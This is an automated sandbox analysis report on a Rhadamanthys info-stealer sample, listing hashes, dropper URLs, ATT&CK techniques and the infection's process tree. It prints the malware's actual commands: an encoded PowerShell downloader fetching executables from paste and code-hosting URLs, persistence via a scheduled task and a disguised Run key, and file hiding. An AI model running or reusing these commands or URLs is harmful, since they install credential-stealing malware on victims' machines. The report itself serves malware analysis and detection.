rhadamanthys | fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

Analysis

max time kernel
21s
max time network
32s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-06-2024 06:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

rhadamanthys execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

ljmfrqdk.g5r2.exe

description pid process target process

PID 1680 created 3016 1680 ljmfrqdk.g5r2.exe sihost.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

2 4848 powershell.exe
4 4848 powershell.exe
11 824 powershell.exe
13 4268 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4848 powershell.exe
4268 powershell.exe
824 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

ljmfrqdk.g5r0.exeljmfrqdk.g5r1.exeljmfrqdk.g5r2.exeljmfrqdk.g5r3.exeljmfrqdk.g5r4.exe

pid process

5000 ljmfrqdk.g5r0.exe
4908 ljmfrqdk.g5r1.exe
1680 ljmfrqdk.g5r2.exe
4164 ljmfrqdk.g5r3.exe
2052 ljmfrqdk.g5r4.exe

description	pid	process	target process
PID 1680 created 3016	1680	ljmfrqdk.g5r2.exe	sihost.exe

flow	pid	process
2	4848	powershell.exe
4	4848	powershell.exe
11	824	powershell.exe
13	4268	powershell.exe

pid	process
5000	ljmfrqdk.g5r0.exe
4908	ljmfrqdk.g5r1.exe
1680	ljmfrqdk.g5r2.exe
4164	ljmfrqdk.g5r3.exe
2052	ljmfrqdk.g5r4.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

ljmfrqdk.g5r4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	ljmfrqdk.g5r4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

13 bitbucket.org
3 bitbucket.org
4 bitbucket.org
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 api.ipify.org
8 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3652 schtasks.exe

flow	ioc
13	bitbucket.org
3	bitbucket.org
4	bitbucket.org

flow	ioc
7	api.ipify.org
8	api.ipify.org

pid	process
3652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exeljmfrqdk.g5r2.exedialer.exe

pid	process
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
824	powershell.exe
824	powershell.exe
824	powershell.exe
4268	powershell.exe
4268	powershell.exe
4268	powershell.exe
1680	ljmfrqdk.g5r2.exe
1680	ljmfrqdk.g5r2.exe
4488	dialer.exe
4488	dialer.exe
4488	dialer.exe
4488	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeljmfrqdk.g5r4.exewmic.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeIncreaseQuotaPrivilege	4848	powershell.exe
Token: SeSecurityPrivilege	4848	powershell.exe
Token: SeTakeOwnershipPrivilege	4848	powershell.exe
Token: SeLoadDriverPrivilege	4848	powershell.exe
Token: SeSystemProfilePrivilege	4848	powershell.exe
Token: SeSystemtimePrivilege	4848	powershell.exe
Token: SeProfSingleProcessPrivilege	4848	powershell.exe
Token: SeIncBasePriorityPrivilege	4848	powershell.exe
Token: SeCreatePagefilePrivilege	4848	powershell.exe
Token: SeBackupPrivilege	4848	powershell.exe
Token: SeRestorePrivilege	4848	powershell.exe
Token: SeShutdownPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeSystemEnvironmentPrivilege	4848	powershell.exe
Token: SeRemoteShutdownPrivilege	4848	powershell.exe
Token: SeUndockPrivilege	4848	powershell.exe
Token: SeManageVolumePrivilege	4848	powershell.exe
Token: 33	4848	powershell.exe
Token: 34	4848	powershell.exe
Token: 35	4848	powershell.exe
Token: 36	4848	powershell.exe
Token: SeDebugPrivilege	2052	ljmfrqdk.g5r4.exe
Token: SeIncreaseQuotaPrivilege	4504	wmic.exe
Token: SeSecurityPrivilege	4504	wmic.exe
Token: SeTakeOwnershipPrivilege	4504	wmic.exe
Token: SeLoadDriverPrivilege	4504	wmic.exe
Token: SeSystemProfilePrivilege	4504	wmic.exe
Token: SeSystemtimePrivilege	4504	wmic.exe
Token: SeProfSingleProcessPrivilege	4504	wmic.exe
Token: SeIncBasePriorityPrivilege	4504	wmic.exe
Token: SeCreatePagefilePrivilege	4504	wmic.exe
Token: SeBackupPrivilege	4504	wmic.exe
Token: SeRestorePrivilege	4504	wmic.exe
Token: SeShutdownPrivilege	4504	wmic.exe
Token: SeDebugPrivilege	4504	wmic.exe
Token: SeSystemEnvironmentPrivilege	4504	wmic.exe
Token: SeRemoteShutdownPrivilege	4504	wmic.exe
Token: SeUndockPrivilege	4504	wmic.exe
Token: SeManageVolumePrivilege	4504	wmic.exe
Token: 33	4504	wmic.exe
Token: 34	4504	wmic.exe
Token: 35	4504	wmic.exe
Token: 36	4504	wmic.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeIncreaseQuotaPrivilege	4504	wmic.exe
Token: SeSecurityPrivilege	4504	wmic.exe
Token: SeTakeOwnershipPrivilege	4504	wmic.exe
Token: SeLoadDriverPrivilege	4504	wmic.exe
Token: SeSystemProfilePrivilege	4504	wmic.exe
Token: SeSystemtimePrivilege	4504	wmic.exe
Token: SeProfSingleProcessPrivilege	4504	wmic.exe
Token: SeIncBasePriorityPrivilege	4504	wmic.exe
Token: SeCreatePagefilePrivilege	4504	wmic.exe
Token: SeBackupPrivilege	4504	wmic.exe
Token: SeRestorePrivilege	4504	wmic.exe
Token: SeShutdownPrivilege	4504	wmic.exe
Token: SeDebugPrivilege	4504	wmic.exe
Token: SeSystemEnvironmentPrivilege	4504	wmic.exe
Token: SeRemoteShutdownPrivilege	4504	wmic.exe
Token: SeUndockPrivilege	4504	wmic.exe
Token: SeManageVolumePrivilege	4504	wmic.exe
Token: 33	4504	wmic.exe
Token: 34	4504	wmic.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

Loader.exepowershell.exeljmfrqdk.g5r0.exeljmfrqdk.g5r1.execmd.exeljmfrqdk.g5r4.execmd.execmd.execmd.exeljmfrqdk.g5r2.exe

description	pid	process	target process
PID 1448 wrote to memory of 4848	1448	Loader.exe	powershell.exe
PID 1448 wrote to memory of 4848	1448	Loader.exe	powershell.exe
PID 4848 wrote to memory of 5000	4848	powershell.exe	ljmfrqdk.g5r0.exe
PID 4848 wrote to memory of 5000	4848	powershell.exe	ljmfrqdk.g5r0.exe
PID 4848 wrote to memory of 5000	4848	powershell.exe	ljmfrqdk.g5r0.exe
PID 4848 wrote to memory of 4908	4848	powershell.exe	ljmfrqdk.g5r1.exe
PID 4848 wrote to memory of 4908	4848	powershell.exe	ljmfrqdk.g5r1.exe
PID 4848 wrote to memory of 4908	4848	powershell.exe	ljmfrqdk.g5r1.exe
PID 4848 wrote to memory of 1680	4848	powershell.exe	ljmfrqdk.g5r2.exe
PID 4848 wrote to memory of 1680	4848	powershell.exe	ljmfrqdk.g5r2.exe
PID 4848 wrote to memory of 1680	4848	powershell.exe	ljmfrqdk.g5r2.exe
PID 4848 wrote to memory of 4164	4848	powershell.exe	ljmfrqdk.g5r3.exe
PID 4848 wrote to memory of 4164	4848	powershell.exe	ljmfrqdk.g5r3.exe
PID 4848 wrote to memory of 2052	4848	powershell.exe	ljmfrqdk.g5r4.exe
PID 4848 wrote to memory of 2052	4848	powershell.exe	ljmfrqdk.g5r4.exe
PID 5000 wrote to memory of 4540	5000	ljmfrqdk.g5r0.exe	cmd.exe
PID 4908 wrote to memory of 596	4908	ljmfrqdk.g5r1.exe	cmd.exe
PID 5000 wrote to memory of 4540	5000	ljmfrqdk.g5r0.exe	cmd.exe
PID 4908 wrote to memory of 596	4908	ljmfrqdk.g5r1.exe	cmd.exe
PID 4540 wrote to memory of 5060	4540	cmd.exe	chcp.com
PID 4540 wrote to memory of 5060	4540	cmd.exe	chcp.com
PID 2052 wrote to memory of 2060	2052	ljmfrqdk.g5r4.exe	attrib.exe
PID 2052 wrote to memory of 2060	2052	ljmfrqdk.g5r4.exe	attrib.exe
PID 596 wrote to memory of 4548	596	cmd.exe	where.exe
PID 596 wrote to memory of 4548	596	cmd.exe	where.exe
PID 4540 wrote to memory of 992	4540	cmd.exe	findstr.exe
PID 4540 wrote to memory of 992	4540	cmd.exe	findstr.exe
PID 2052 wrote to memory of 1292	2052	ljmfrqdk.g5r4.exe	attrib.exe
PID 2052 wrote to memory of 1292	2052	ljmfrqdk.g5r4.exe	attrib.exe
PID 2052 wrote to memory of 4504	2052	ljmfrqdk.g5r4.exe	wmic.exe
PID 2052 wrote to memory of 4504	2052	ljmfrqdk.g5r4.exe	wmic.exe
PID 4540 wrote to memory of 1104	4540	cmd.exe	findstr.exe
PID 4540 wrote to memory of 1104	4540	cmd.exe	findstr.exe
PID 596 wrote to memory of 824	596	cmd.exe	powershell.exe
PID 596 wrote to memory of 824	596	cmd.exe	powershell.exe
PID 4540 wrote to memory of 2612	4540	cmd.exe	findstr.exe
PID 4540 wrote to memory of 2612	4540	cmd.exe	findstr.exe
PID 4540 wrote to memory of 1884	4540	cmd.exe	schtasks.exe
PID 4540 wrote to memory of 1884	4540	cmd.exe	schtasks.exe
PID 4540 wrote to memory of 3652	4540	cmd.exe	schtasks.exe
PID 4540 wrote to memory of 3652	4540	cmd.exe	schtasks.exe
PID 4540 wrote to memory of 5100	4540	cmd.exe	cmd.exe
PID 4540 wrote to memory of 5100	4540	cmd.exe	cmd.exe
PID 5100 wrote to memory of 2040	5100	cmd.exe	reg.exe
PID 5100 wrote to memory of 2040	5100	cmd.exe	reg.exe
PID 4540 wrote to memory of 4208	4540	cmd.exe	cmd.exe
PID 4540 wrote to memory of 4208	4540	cmd.exe	cmd.exe
PID 4208 wrote to memory of 68	4208	cmd.exe	reg.exe
PID 4208 wrote to memory of 68	4208	cmd.exe	reg.exe
PID 4540 wrote to memory of 4268	4540	cmd.exe	powershell.exe
PID 4540 wrote to memory of 4268	4540	cmd.exe	powershell.exe
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	dialer.exe
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	dialer.exe
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	dialer.exe
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	dialer.exe
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	dialer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

2060 attrib.exe
1292 attrib.exe

pid	process
2060	attrib.exe
1292	attrib.exe

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:3016

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4488

C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848

C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe
"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:5060

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:992

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:1104

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:2612

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:1884

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
5⤵
- Creates scheduled task(s)
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:68

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4268

C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe
"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:596

C:\Windows\system32\where.exe
where node
5⤵
PID:4548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe
"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1680

C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe
"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe"
3⤵
- Executes dropped EXE
PID:4164

C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
4⤵
- Views/modifies file attributes
PID:2060

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
4⤵
- Views/modifies file attributes
PID:1292

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
91897de07fcb115c5f42cf4c7a984982

SHA1
4903ea814fed6c31b62b394cc9eb024d107b1834

SHA256
bb34e4a3e0dd9623e77f569dbd0093b19dd43e91bb911dc7758e09fb4a53f789

SHA512
54fbd604758c7bc66151018d18bdb140d26e8dcc5d03e974197b0f3b63946eb338bf323f80b4a3e02fd109337cc1c7c8389eb15b17e0d55fced35a0398efcf4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
45d62890ffc360398bca85751bac0ade

SHA1
68f3f439c4a1f5cb02073d4af55c6854bd775e95

SHA256
66cff04910713a4690f24354994e974bb08fc5a0379b8c4eb48d134bb5a84e74

SHA512
3d07a452094aa55035e3d6d0970d0cb332f6d3f1c0c2c8667c71b98f9b280dae17709b7340ac5a47c76b44e86b7a21181d410f5c922a4aaf73717c6d45a07e29

Download Submit
C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat
Filesize
1KB

MD5
c767a4ce4fc8d490fb2af1daa95a84c6

SHA1
a198c337f2f3eac7ea75ed82f6a765e2f8bcda92

SHA256
c2fdf52cc1547c64a984e5e04b13d2fbd4a8e7b4c8f7d738f1c8618c9fe0613c

SHA512
cbcc782ea2af0594ed15cfcf243d22da61d27b63ec7e6dc6f394c891efd398fc64690dbeb944213c7f8f8d6589e75adc8f55c87aec8515422d51ccc5a479851f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat
Filesize
6KB

MD5
b5d0441990b0eb32503744dc54199f44

SHA1
ff62e8b4ffb31d7d441fa65f8603946a2c0fea7a

SHA256
05bea0edc97f37ea1fb3d4ed27b1c8a372918338e98855f45cdd414d7777fc1c

SHA512
a698b650a94eba4a99336c2afa472ccc89bc22c50ee486f8cdffd96c77935bae2180166eac99e6aa5ca86a1c784259ad13311a5404a2df889d392f34139fcff5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22ys433f.oz1.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe
Filesize
94KB

MD5
6460dff2e792fd74bfc7db3d8c747a58

SHA1
5a395e8f069c17b3f9cfd6a663ca60512b628142

SHA256
1656c23a4f17b821d523293ff4ba84b2c66a11db761782a774dd47b4c8c7667f

SHA512
808ba395708c5d0a4ebe4ca8d1a4f2011abae61c0d2a36f84af7d097ddba7262c220def4fbfc86881db52b0189f008c5f7de39574f26b3bdfb2e5b10c29eb1a9

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe
Filesize
88KB

MD5
c4b307c1aeca9d40de4b8ef5a7299c85

SHA1
ea7e1d5a5ef83a0f2ce119a56b441493dd1dd5bd

SHA256
56374adc264aa171a8804dbc071ec959f71d54aeefd824d16e2a2e7a427cecac

SHA512
2fce556f6ac9d005dd62907e5c852a91a0b7f777f68a1946a3ceb27440a4457de3952e25dd2e35e62474fe8ab0df1cb10a2a92b699fec776364bec54d4565bfb

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe
Filesize
355KB

MD5
c93d65bc0ed7ee88d266b4be759301f8

SHA1
8c0c415ba824737c61904676e7132094f5710099

SHA256
f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

SHA512
7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe
Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
Filesize
9.5MB

MD5
b8c70bbe49951cb98becf2fc0bce3b7b

SHA1
9c22bea97baabb2b9a216a9cd2fce6b090338b06

SHA256
2835b997c97408baa0da7326c63278207bcb5637f6ecb2ba70b3036092e96bc6

SHA512
6b305a8a12f2ddc43af26869c9660007a190bae263f52efc7c7c398aa0756bb49087ab308270634171cc85d12506b310c28b1b63bcd7bc7f6477931f9a6edfb4

Download Submit
memory/1448-1-0x0000000000740000-0x0000000000748000-memory.dmp

Filesize
32KB

Download
memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

Filesize
4KB

Download
memory/1680-162-0x00000000772F0000-0x00000000774B2000-memory.dmp

Filesize
1.8MB

Download
memory/1680-164-0x0000000001260000-0x00000000012CD000-memory.dmp

Filesize
436KB

Download
memory/1680-91-0x0000000001260000-0x00000000012CD000-memory.dmp

Filesize
436KB

Download
memory/1680-160-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmp

Filesize
1.9MB

Download
memory/1680-159-0x0000000000E40000-0x0000000001240000-memory.dmp

Filesize
4.0MB

Download
memory/1680-158-0x0000000000E40000-0x0000000001240000-memory.dmp

Filesize
4.0MB

Download
memory/4488-163-0x00000000009D0000-0x00000000009D9000-memory.dmp

Filesize
36KB

Download
memory/4488-166-0x0000000004A20000-0x0000000004E20000-memory.dmp

Filesize
4.0MB

Download
memory/4488-167-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmp

Filesize
1.9MB

Download
memory/4488-169-0x00000000772F0000-0x00000000774B2000-memory.dmp

Filesize
1.8MB

Download
memory/4848-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-7-0x000002C226F00000-0x000002C226F22000-memory.dmp

Filesize
136KB

Download
memory/4848-11-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-12-0x000002C23F220000-0x000002C23F296000-memory.dmp

Filesize
472KB

Download
memory/4848-108-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-26-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-13-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-49-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download